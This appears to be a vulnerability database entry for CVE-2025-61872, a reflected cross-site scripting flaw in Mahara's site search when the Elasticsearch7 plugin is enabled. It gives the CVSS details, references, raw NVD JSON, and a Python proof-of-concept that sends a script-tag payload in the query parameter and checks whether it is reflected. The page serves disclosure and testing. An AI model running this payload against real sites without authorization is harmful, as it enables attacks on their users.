CVE-2025-61872

Description

Mahara before 25.04.2 and 24.04.11 are vulnerable to displaying results that can trigger XSS via a malicious search query string. This occurs in the 'search site' feature when using the Elasticsearch7 search plugin. The Elasticsearch function does not properly sanitize input in the query parameter.

CVSS Details

CVSS Score

6.1

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Mahara < 25.04.2

Mahara < 24.04.11

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# PoC for CVE-2025-61872 Mahara XSS Vulnerability
# This script demonstrates testing for the XSS flaw in the search query.

import requests

def check_xss(target_url):
    # The vulnerability occurs in the search site feature with Elasticsearch7
    # Injecting a basic JavaScript payload into the query parameter
    payload = '"><script>alert(1)</script>'
    
    search_endpoint = f"{target_url}/search/index.php"
    params = {
        "query": payload  # Vulnerable parameter
    }
    
    try:
        response = requests.get(search_endpoint, params=params, timeout=10)
        
        # Check if the payload is reflected unescaped in the response
        if payload in response.text:
            print(f"[+] Potential XSS found at: {response.url}")
            print(f"[+] Payload reflected in response.")
        else:
            print("[-] Payload not reflected or target patched.")
            
    except requests.RequestException as e:
        print(f"[!] Error connecting to target: {e}")

if __name__ == "__main__":
    target = "http://localhost/mahara" # Replace with actual target
    check_xss(target)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-61872
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-61872
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-61872/
[4] VulDB https://vuldb.com/cve/CVE-2025-61872
[5] https://mahara.org
[6] https://mahara.org/interaction/forum/topic.php?id=9851

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-61872", "sourceIdentifier": "[email protected]", "published": "2026-04-24T15:16:25.320", "lastModified": "2026-04-24T17:54:36.243", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Mahara before 25.04.2 and 24.04.11 are vulnerable to displaying results that can trigger XSS via a malicious search query string. This occurs in the 'search site' feature when using the Elasticsearch7 search plugin. The Elasticsearch function does not properly sanitize input in the query parameter."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://mahara.org", "source": "[email protected]"}, {"url": "https://mahara.org/interaction/forum/topic.php?id=9851", "source": "[email protected]"}]}}